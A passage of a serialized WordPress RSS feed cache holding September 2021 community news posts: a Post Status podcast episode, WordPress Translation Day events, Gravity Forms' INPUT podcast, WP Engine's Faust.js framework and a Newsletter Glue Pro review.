Thoughts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=86526\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://poststatus.com/excerpt/25/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4259:\"<h2>“When it comes to the entrepreneurial journey &#8211; the highest highs and the lowest lows are always people.”</h2>\n\n\n\n<p class=\"has-drop-cap\">In this episode of Post Status Excerpt, David and Cory first discuss how hard it is to do &#8220;the right thing&#8221; and potentially dealing with tough and negative feedback as a result. How does an entrepreneur prepare for &#8220;roller coaster&#8221; times — especially if the ride is heading down? What should you keep in mind? Cory shares an <strong>iThemes</strong> experience in response.</p>\n\n\n\n<p><strong>Also covered in this episode: </strong>Cory and David talk about the $12 billion acquisition of <strong>MailChimp</strong> by <strong>Intuit</strong>, and how that could potentially reshape the business landscape for WordPress users and entrepreneurs.</p>\n\n\n\n<p><strong>Note:</strong> David misspoke and said &#8220;Stripe&#8221; instead of &#8220;Square.&#8221; Forgive him.</p>\n\n\n\n\n\n\n\n<p class=\"has-background\">Every week <strong><a href=\"https://poststatus.com/podcast/the-excerpt/\">Post Status Excerpt</a></strong> will brief you on important WordPress news — in about 15 minutes or less! Learn what\'s new in WordPress in a flash. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/26a1.png\" alt=\"⚡\" class=\"wp-smiley\" /><br /><br />You can listen to <a href=\"https://poststatus.com/podcast/the-excerpt/\">past episodes</a> of <strong>The Excerpt</strong>, <a href=\"https://poststatus.com/category/post-status-podcasts/\">browse all our podcasts</a>, and don’t forget to subscribe on <a href=\"https://open.spotify.com/show/1m3xwXbe0MG5BzFVPtB0A7\">Spotify</a>, Amazon Music, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\">Google Podcasts</a>, <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">iTunes</a>, <a href=\"https://castro.fm/podcast/c53552c6-1ee0-4fc4-9de4-08ed6bf1ee4d\">Castro</a>, <a href=\"https://www.youtube.com/c/PostStatus\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, <a href=\"https://player.fm/series/wordpress-post-status-podcasts\">Player.fm</a>, <a href=\"https://pca.st/05rR\">Pocket Casts</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\">Simplecast</a>, or by <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f3a7.png\" alt=\"?\" class=\"wp-smiley\" /></p>\n\n\n\n<h3 id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f517.png\" alt=\"?\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul><li><a href=\"https://www.amazon.com/Learned-Optimism-Change-Your-Mind-ebook/dp/B005DB6S7K?dchild=1&keywords=learned+optimism&qid=1631819326&sr=8-1&linkCode=sl1&tag=corymiller00-20&linkId=5a52bad780e8b090e3e6e7e2d78c77fd&language=en_US&ref_=as_li_ss_tl\">Learned Optimism: How to Change Your Mind and Your Life</a></li><li><a href=\"https://techcrunch.com/2021/09/13/intuit-confirms-12b-deal-to-buy-mailchimp/\">Intuit confirms $12B deal to buy Mailchimp</a></li><li><a href=\"https://twitter.com/syedbalkhi/status/1438173024361005058\">Syed Balkhi on Twitter</a>: Accept payments in WordPress using <strong>Square</strong> and <strong>WPForms</strong>.</li><li><a href=\"https://twitter.com/dimensionmedia\" target=\"_blank\" rel=\"noreferrer noopener\">David Bisset (Twitter)</a></li><li><a href=\"https://twitter.com/corymiller303\" target=\"_blank\" rel=\"noreferrer noopener\">Cory Miller (Twitter)</a></li><li><a href=\"https://twitter.com/post_status\" target=\"_blank\" rel=\"noreferrer noopener\">Post Status (Twitter)</a></li></ul>\n\n\n\n<h3><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f64f.png\" alt=\"?\" class=\"wp-smiley\" /> Sponsor: <a href=\"https://poststat.us/sandhills\" target=\"_blank\" rel=\"noreferrer noopener sponsored nofollow\">GoDaddy Pro</a></h3>\n\n\n\n<p>Manage your clients, websites, and tasks from a single dashboard with GoDaddy Pro. Perform security scans, backups, and remote updates to many sites on any host. Check up on site performance, monitor uptime and analytics, and then send reports to your clients. GoDaddy Pro is free — and designed to make your life better.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Sep 2021 22:30:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"David Bisset\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"WordPress.org blog: Join us for WordPress Translation Day Global Events in September 2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11215\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"https://wordpress.org/news/2021/09/join-us-for-wordpress-translation-day-global-events-in-september-2021/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7891:\"<p>WordPress contributors around the world are <a href=\"https://wptranslationday.org/\">celebrating the sixth Global WordPress Translation Day</a> throughout the entire month of September! That&#8217;s 30 days dedicated to help and encourage the volunteers that translate the software and its related resources. One of the highlights will be a <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">series of exciting global events</a>, starting on September 17 2021 and finishing on the United Nations&#8217; International Translation Day itself on September 30, 2021.</p>\n\n\n\n<p>Everyone is welcome to watch these events live on <a href=\"https://www.youtube.com/c/WordPressMarketingTeam\">YouTube</a> and to share their translation stories which will be featured during the celebrations and beyond. The global events will be in English and include presentations on how and why to you should join the thousands of translators in the project, tips and tools, interviews, and much more. </p>\n\n\n\n<p>There are now 205 locales translating in what is a remarkable open source effort, bringing the opportunities of the software and its community to people in their own native languages.   </p>\n\n\n\n<h2>Inaugural session: Introduction and latest news on WordPress Translation</h2>\n\n\n\n<h3><strong>Friday, September 17, 2021 at </strong><a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210917T1000\"><strong>10:00 UTC</strong></a></h3>\n\n\n\n<p>We will start the <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">global events</a> with a panel featuring the latest update on what is happening in the world of WordPress polyglots. Panellists will include translators and polyglot supporters <a href=\"https://profiles.wordpress.org/petya/\">Petya Raykovska</a> and <a href=\"https://profiles.wordpress.org/evarlese/\">Erica Varlese</a>. There will be a video demonstration on how to translate WordPress, a short presentation on translation statistics, a run down of upcoming events, and more. <br /><br />Watch the <a rel=\"noreferrer noopener\" href=\"https://www.youtube.com/watch?v=3HSBB5F_ag0\" target=\"_blank\">event live on YouTube</a> (or click on the play button below) &#8211; sign-up for notifications in the video stream right now so you don&#8217;t miss it when it goes live! </p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<h3><strong>Friday, September 17, 2021 at 11:00 UTC</strong> </h3>\n\n\n\n<p>Right after the livestream, there will be a &#8216;drop-in&#8217; translation sprint on Zoom video-conferencing, open to all. You can join and hang out virtually with your Polyglots friends from all around the world and translate WordPress in your own language! <a href=\"https://www.meetup.com/Portsmouth-WordPress-Meetup/events/280823032/\">RSVP for the session now and get joining links!</a> </p>\n\n\n\n<img src=\"https://lh4.googleusercontent.com/r2rVEDkb39h02LiBg2GdayDk1LpZi6kxZnv1MRzT9h6pgSQE9FMBmyx_kJUA-Pjyy1KD__YlzLYvd1P53o1UIxTEfb0fmQnHm40UU23Wb1slXm-ajdGNP5qOyzHyTI07NBCM-mwY=s0\" alt=\"\" />\n\n\n\n<h2>Check out the other exciting global events</h2>\n\n\n\n<h3><strong>Sunday, September 19, 2021 <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210919T1200\">12:00 UTC</a></strong></h3>\n\n\n\n<p><a rel=\"noreferrer noopener\" href=\"https://www.youtube.com/watch?v=M7UtEKIp2FY\" target=\"_blank\"><strong>Panel on Polyglots Tools</strong></a><a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210919T1200\"> <br /></a>Join <a href=\"https://profiles.wordpress.org/amieiro/\">Jesús Amieiro</a>, <a href=\"https://profiles.wordpress.org/psmits1567/\">Peter Smits</a>, <a href=\"https://profiles.wordpress.org/vladytimy/\">Vlad Timotei</a>, and <a href=\"https://profiles.wordpress.org/vibgyj/\">Vibgy Joseph</a> to talk about the tools they’ve contributed to or developed to help translators and translation editors.</p>\n\n\n\n<h3><strong>Tuesday, September 21, 2021 <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210921T1100\">11:00 UTC</a></strong></h3>\n\n\n\n<p><a href=\"https://www.youtube.com/watch?v=0Ps8byYIwLs\"><strong>Panel on Open Source Translation Communities</strong></a> (YouTube link &#8211; opens in a new tab)<a rel=\"noreferrer noopener\" href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210921T1100\" target=\"_blank\"><br /></a>Join <a href=\"https://profiles.wordpress.org/vanillalounge/\">Zé Fontainhas</a> (WordPress), <a href=\"https://profiles.wordpress.org/tokyobiyori/\">Ali Darwich</a> (WordPress), <a href=\"https://www.linkedin.com/in/mstanke?originalSubdomain=cz\">Michal Stanke</a> (Mozilla), and <a href=\"https://www.linkedin.com/in/satomi-tsujita/?originalSubdomain=jp\">Satomi Tsujita</a> (Hyperledger Fabric) to learn about nurturing translation communities.</p>\n\n\n\n<h3><strong>Thursday, September 30, 2021 <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210930T1600\">16:00 UTC</a></strong></h3>\n\n\n\n<p><a href=\"https://www.youtube.com/watch?v=qyQUaiK19js\"><strong>Closing Party – Why do you translate?</strong></a> <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210930T1600\"><br /></a>Our finale event for 2021 with emcee <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a> and a panel from the WordPress Translation Day Team. It will feature highlights from some of the local and global events during the month and a selection of results. Some of the nominees for this year&#8217;s polyglots appreciation will join the livestream to share their stories.</p>\n\n\n\n<p>The livestream will be followed by an after party celebration for anyone who has taken part in the event or is a WordPress polyglot. <a href=\"https://www.meetup.com/Portsmouth-WordPress-Meetup/events/280823393/\">Book now</a> for the session on Zoom.</p>\n\n\n\n<h2>Ideas on how to get involved this September</h2>\n\n\n\n<p>There&#8217;s lots of ways to take part &#8211; discover this <a href=\"https://wptranslationday.org/blog/ways-to-participate/\">list of ideas</a>.</p>\n\n\n\n<p>You can also nominate <a href=\"https://wptranslationday.org/blog/call-for-nominations-polyglots-appreciation/\">translation contributors</a> to be featured in this year&#8217;s celebrations.</p>\n\n\n\n<h2>Help us spread the word about #WPTranslationDay</h2>\n\n\n\n<ul><li>Share what you are translating using the #WPTranslationDay hashtag on: <a href=\"https://www.facebook.com/WPTranslationDay/\">Facebook</a>,<a href=\"https://twitter.com/TranslateWP\"> Twitter</a>, <a href=\"https://www.instagram.com/wptranslationday/\">Instagram</a>, and <a href=\"https://www.linkedin.com/company/wptranslationday/\">LinkedIn</a>! </li><li>You can also find images and translator badges in our <a href=\"https://wptranslationday.org/wptd-2021/media-kit/\">Media Kit</a> to share during September.</li></ul>\n\n\n\n<p>For more information on the 2021 WordPress Translation Day celebrations, visit <a href=\"https://wptranslationday.org/\">the WordPress Translation Day website</a>.</p>\n\n\n\n<p></p>\n\n\n\n<p><em>Props to <a href=\"https://profiles.wordpress.org/webcommsat/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>webcommsat</a>, <a href=\"https://profiles.wordpress.org/harishanker/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>harishanker</a>, <a href=\"https://profiles.wordpress.org/lmurillom/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>lmurillom</a>, <a href=\"https://profiles.wordpress.org/oglekler/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>oglekler</a>, <a href=\"https://profiles.wordpress.org/meher/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>meher</a>, <a href=\"https://profiles.wordpress.org/nalininonstopnewsuk/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>nalininonstopnewsuk</a>, <a href=\"https://profiles.wordpress.org/evarlese/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>evarlese</a></em> for contributing to this story.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Sep 2021 21:51:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"webcommsat AbhaNonStopNewsUK\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Gravity Forms Launches INPUT YouTube Channel and Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122576\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:177:\"https://wptavern.com/gravity-forms-launches-input-youtube-channel-and-podcast?utm_source=rss&utm_medium=rss&utm_campaign=gravity-forms-launches-input-youtube-channel-and-podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3086:\"<div class=\"wp-block-image\"><img /></div>\n\n\n\n<p><a href=\"https://www.gravityforms.com/\">Gravity Forms</a> has launched a new YouTube channel and podcast called <a href=\"https://www.youtube.com/channel/UCwuBpuj2CXg5qIOfHgyzlXw\">INPUT</a>, which will focus on sharing the stories and experiences of people inside and outside the WordPress ecosystem. James Giroux, a Rocketgenius employee who joined the company in 2020, is the host of the show and will be interviewing guests from various industries and disciplines.</p>\n\n\n\n<p>The first episode is a deep dive into the history of Gravity Forms, one of the most successful WordPress plugin companies that has been operating for 14 years. Its founders share a nostalgic look back at the early days of Rocketgenius, including the story of their first sale and first hire. </p>\n\n\n\n<p>They also discussed how the Gutenberg era marks a major shift in WordPress that has impacted the future of the Gravity Forms. The average WordPress user is decidedly no longer a developer who knows how to tinker with PHP, but is now more often a content creator or power user. As the barrier to WordPress development is getting higher, the Gravity Forms team is focusing on making the product easier to use for non-developers but still powerful for those capable of extending it.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<p>The episode is part of what Giroux calls a 3T sub-series (team, tools, and techniques) that will feature discussions about the company&rsquo;s product, marketing, operations, culture, and ecosystem. The next sub-series is called Agency101 and will feature topics related to agency life for both small and large companies. Brad Miller from 10up will be the first guest of that series.</p>\n\n\n\n<p>&ldquo;The third is a bit of a departure, but we&rsquo;re interviewing people outside of the WordPress ecosystem in a sub-series called &lsquo;The Story Of&hellip;,\'&rdquo; Giroux said. &ldquo;The episode after Brad&rsquo;s is with the lead singer of Anberlin, who have sold over 1M albums and have charted multiple times on the Billboard Rock charts. The idea behind this series is to introduce WordPress problem-solvers (developers, agencies, freelancers, etc.) to new industries and perhaps create some opportunities for new ideas and products to spring up in support of them.&rdquo;</p>\n\n\n\n<p>Giroux also plans to chat with TV show creators/hosts, radio broadcasters, inventors, and others to create a well-rounded mix of shows that appeal to everyday WordPress users as well as those who are deeply involved in contributing.</p>\n\n\n\n<p>&ldquo;To me, the WordPress lifestyle is that feeling you get when you show up to a WordCamp or meetup and see other WordPressers,&rdquo; Giroux said. &ldquo;It&rsquo;s about rocking the t-shirt, celebrating unique and diverse voices, promoting a WWW that is accessible to all, inspiring and being inspired by creativity and how WordPress powers us to do great things. There&rsquo;s a little Wapuu in all of us and Input, I hope, will be a space where we can celebrate that.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Sep 2021 21:00:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: WP Engine Launches Faust.js, a New Headless WordPress Framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122797\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:189:\"https://wptavern.com/wp-engine-launches-faust-js-a-new-headless-wordpress-framework?utm_source=rss&utm_medium=rss&utm_campaign=wp-engine-launches-faust-js-a-new-headless-wordpress-framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4407:\"<p>WP Engine has <a href=\"https://wpengine.com/blog/faust-js-the-framework-for-headless-wordpress/\">launched</a> Faust.js, a new headless framework that is open source and designed to work in any Node hosting environment. The framework is built on <a rel=\"noreferrer noopener\" href=\"https://nextjs.org/\" target=\"_blank\">Next.js</a>, which can handle both static site generation and server side rendering. It uses GraphQL for data fetching and is the only framework that allows developers to query the WPGraphQL API without having to know GraphQL queries ahead of time.</p>\n\n\n\n<p>Faust.js was in its earlier stages when WP Engine <a href=\"https://wptavern.com/wp-engine-invests-in-headless-wordpress-hires-wpgraphql-maintainer\">hired WPGraphQL creator and maintainer Jason Bahl</a>. The company has been heavily investing in headless infrastructure development, hiring more engineers for projects aimed at reducing the friction of using WordPress as a headless CMS. This is the main thrust of the new framework &ndash; to allow developers to build scalable, better performing sites with modern frontend tools while preserving WordPress&rsquo; rich publishing experience. Faust.js includes content previews, support for custom post types, and built-in authentication to support paywalls, e-commerce, membership sites, and other functionality that has traditionally been difficult for headless sites.</p>\n\n\n\n<p>How does Faust.js differ from existing headless solutions like the React-based Frontity framework? Developers building headless sites are curious after <a href=\"https://wptavern.com/automattic-acquires-frontity-founders-to-work-full-time-on-gutenberg\">Automattic acquired Frontity</a> and the framework&rsquo;s maintainers exited to work full-time on Gutenberg. Using a community-supported headless framework can be a risky bet for enterprise clients when its creators and maintainers are no longer able to contribute.</p>\n\n\n\n<p>&ldquo;Frontity and Faust are similar, the main difference is that Frontity focuses on providing a framework on-top of React where Faust is primarily built with Next.js support in-mind,&rdquo; Faust.js creator William Johnston said. &ldquo;This small distinction is meaningful and means when you are using Faust you can take advantage of all the amazing benefits of Next. It also lets Faust focus specifically on how to make Headless WordPress a better experience, without having to come up with a comprehensive solution for front-end, node-base, static/server-side applications.<a href=\"https://twitter.com/wjohnsto\"></a>&ldquo;</p>\n\n\n\n<p>When asked how Faust stacks up to Frontity in a <a href=\"https://www.reddit.com/r/ProWordPress/comments/pnorkm/wp_engines_new_headless_wordpress_framework/hcz2nul/?utm_source=reddit&utm_medium=web2x&context=3\">comment</a> on Reddit, WP Engine developer relations engineer Kellen Mace highlighted a few other major differences between the frameworks. Frontity only works with the WP REST API and Faust uses WPGraphQL &ldquo;for more efficient queries.&rdquo; </p>\n\n\n\n<p>&ldquo;Technically, Faust is built in &lsquo;layers,&rsquo; so even if you choose to build your frontend app using SvelteKit, Nuxt, etc. you can still leverage several of the tools Faust provides,&rdquo; Mace said. &ldquo;We&rsquo;ll have more documentation coming out on using it with other JS frameworks in the near future. Using it with Next.js gives you the most &lsquo;bang for your buck,&rsquo; however.&rdquo;</p>\n\n\n\n<p>Johnston confirmed that certain elements of Faust (the core/React pieces), are already working with the React-based GatsbyJS framework. Faust is less opinionated about the frontend and is more centered around making the WordPress publishing experience better.</p>\n\n\n\n<p>A demo of Faust in action is available at <a href=\"https://developers.wpengine.com/\">developers.wpengine.com</a>.  The framework, which includes NPM packages and a WordPress plugin, can be found <a href=\"https://github.com/wpengine/faustjs\">on GitHub</a>, but its maintainers caution that there will be breaking changes in the future. Developers who are interested in learning more about Faust.js can check out the <a href=\"https://faustjs.org/\">documentation</a> or listen to the most recent <a href=\"https://developers.wpengine.com/podcast/9072674\">episode of the DE{CODE} podcast</a> where Johnston discusses headless WordPress and introduces the framework.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Sep 2021 04:36:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Newsletter Glue Pro, My First Foray Into Journalism, and New Ideas\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122547\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:193:\"https://wptavern.com/newsletter-glue-pro-my-first-foray-into-journalism-and-new-ideas?utm_source=rss&utm_medium=rss&utm_campaign=newsletter-glue-pro-my-first-foray-into-journalism-and-new-ideas\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5200:\"<p class=\"has-drop-cap\">As a teen, I would visit my Uncle David&rsquo;s house every other week or so. He was the only family member with a computer. It was an old, bulky monstrosity that ran whatever the latest version of Windows that existed at the time. It was one of my first introductions to dial-up, but my primary interest was not the internet. It was newsletters and home-printed magazines.</p>\n\n\n\n<p>Like all members of my family, we are artists in one way or another. What little extra money many have is spent on creative pursuits. Uncle David&rsquo;s latest passions at the time were in designing T-shirt logos and printing a family newsletter. <em>Does anyone remember when those were still a thing?</em> I was a kid in a whole new world. Of course, I followed suit and issued a few pamphlets covering the latest goings-on with my family to a circulation of maybe a dozen people.</p>\n\n\n\n<p>This kick-started my foray into journalism and design during my adolescence. A family newsletter sounds far more interesting to me now, as an adult, than it did in those days. Somehow, I know I have reached the point where I can officially call myself old by saying that. But, I was coming of age at the turn of the millennium. My interests mostly revolved around video games. I wanted to create something that rivaled <em>Nintendo Power</em> from the comfort of my own home. I had access to a computer and printer; the dream was mine for the taking.</p>\n\n\n\n<img />\n\n\n\n<p>Unfortunately, I could not find any of my printed family newsletters to share. My gaming mag was a short-lived, two-issue venture. I am sure the staff, consisting of my younger sister and best friend, unionized and staged a revolt.</p>\n\n\n\n<p>Throughout my life, I have always had it in the back of my mind that I would attempt another periodical at some point, but I have never gotten around to it. However, when <a href=\"https://wordpress.org/plugins/newsletter-glue/\">Newsletter Glue</a> co-founder Lesley Sim asked me to look at the pro version of her team&rsquo;s plugin, all those old ideas started swirling around in my head again.</p>\n\n\n\n<p>After spending the last few days tinkering with <a href=\"https://newsletterglue.com/\">Newsletter Glue Pro</a>, I kind of want to restart the family newsletter again. Maybe digital is the way to go. Perhaps I can even get my uncle to join me.</p>\n\n\n\n<p>Admittedly, I have had a lot more fun with this plugin than with others recently. It is the sort of extension that can take a potential newsletter from idea to execution.</p>\n\n\n\n<p>All you need is to be familiar with the WordPress editor to kick-start a new project. The plugin has a few settings you might want to tinker with, but the onboarding process walks you through the steps of getting everything off the ground and connecting to your preferred email software. I was worried that there would be a massive learning curve, but I was in the editor in short order.</p>\n\n\n\n<img />Writing a newsletter from the WordPress editor.\n\n\n\n<p>Users can publish blog posts as newsletters. However, the team <a href=\"https://newsletterglue.com/blog/product-updates/newsletter-editor/\">introduced a dedicated newsletter post type</a> earlier this year, providing more flexibility in creating content.</p>\n\n\n\n<p>What I enjoyed the most about Newsletter Glue was its integration with the block patterns API. The plugin bundles several header and footer patterns, but end-users can build and store their own for reuse.</p>\n\n\n\n<img />Duplicating and customizing a footer pattern.\n\n\n\n<p>The plugin did have its share of issues. The most prominent was its automatic switching to the fullscreen editor, which is a feature that I turn off on every WordPress site I use. For some reason, this either did not save or was being overwritten each time I loaded the page.</p>\n\n\n\n<p>I am also not a fan of the meta box at the bottom of the screen. It is giving me flashbacks of the pre-5.0 WordPress editor that I would like to forget. The team should create a dedicated sidebar panel for the newsletter screen.</p>\n\n\n\n<img />Newsletter meta box.\n\n\n\n<p>With its reliance on the modern editor, this holdover from an older time just feels out of place. Plus, from a UI perspective, there seems to be nothing requiring the old meta box system.</p>\n\n\n\n<p>I would also like to see the built-in Newsletter theme designer integrate with the active theme&rsquo;s JSON presets. This is a relatively new WordPress feature, so maybe it will land on the features list.</p>\n\n\n\n<img />Newsletter theme designer.\n\n\n\n<p>Because this is a standardized format, there is no reason that plugins should not start pulling data from it. As a user, I should at least be able to pick and choose text, background, and link colors from those made available through the 